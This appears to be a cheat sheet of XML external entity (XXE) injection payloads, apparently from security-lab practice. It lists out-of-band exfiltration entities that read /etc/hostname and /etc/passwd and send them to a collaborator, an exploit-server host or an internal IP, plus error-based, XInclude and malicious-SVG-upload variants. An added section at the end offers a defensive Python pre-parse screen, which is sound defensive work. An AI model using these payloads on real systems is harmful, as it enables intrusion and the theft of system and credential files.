XML Injection

Data Exfiltration

In collaborator

<!DOCTYPE root [<!ENTITY % test SYSTEM 'https://exploit-0a8800de03604a7680361120014800f5.exploit-server.net/exploit'>%test;]>

In Exploit Server

<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % nden " <!ENTITY &#x25; dump SYSTEM 'http://cuano2qlqqprvzo1y59242wwdnje75vu.oastify.com/?filter=%file;'>">

%nden;
%dump;

Data Exfiltration via Error Messages

In collaborator

<!DOCTYPE root [<!ENTITY % test SYSTEM 'https://exploit-0a18006804d1198084153639014900c1.exploit-server.net/exploit'>%test;]>

In Exploit Server

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

XInclude

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

Image File Upload

  1. Create .svg file

  2. Put this content in it

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

  3. Upload the file and retrieve the content

<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % nden " <!ENTITY &#x25; dump SYSTEM 'http://10.100.13.203/?filter=%file;'>">
%nden;
%dump;
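
Defender-side check for the payload shapes above (added example, not part of the original notes): a pre-parse screen for untrusted XML or SVG uploads that reports any DOCTYPE, entity declaration or XInclude element so the document can be rejected before it reaches the real parser. The function name screen_xml and the sample documents are constructed for illustration, and the hosts in them are placeholders.

```python
import xml.parsers.expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

def screen_xml(data: bytes) -> list[str]:
    """Return reasons to reject an untrusted XML/SVG document (empty list = none found)."""
    findings = []
    # expat itself never fetches external entities or DTDs (that needs an
    # ExternalEntityRefHandler), so this pass only reports declarations.
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE declaration for {name!r}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        where = "internal" if sysid is None else "external"
        findings.append(f"{where} {kind} entity {name!r}")

    def on_start(name, attrs):
        # With a namespace separator set, names arrive as "<namespace URI> <local name>".
        if name == f"{XINCLUDE_NS} include":
            findings.append(f"XInclude element href={attrs.get('href')!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"not well-formed: {exc}")
    return findings

# Constructed samples mirroring the shapes on this page; hosts are placeholders.
OOB_DOC = b"<!DOCTYPE root [<!ENTITY % test SYSTEM 'https://dtd.example.invalid/x.dtd'>%test;]><root/>"
XINCLUDE_DOC = (b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
                b'<xi:include parse="text" href="file:///etc/passwd"/></foo>')
SVG_DOC = (b'<?xml version="1.0" standalone="yes"?>'
           b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>'
           b'<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>')
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><text>hello</text></svg>'

if __name__ == "__main__":
    for label, doc in [("oob", OOB_DOC), ("xinclude", XINCLUDE_DOC),
                       ("svg", SVG_DOC), ("clean", CLEAN_SVG)]:
        print(label, screen_xml(doc) or "accepted")
```

This screen complements, and does not replace, disabling DTD processing, external entity resolution and XInclude in the parser that actually handles the upload.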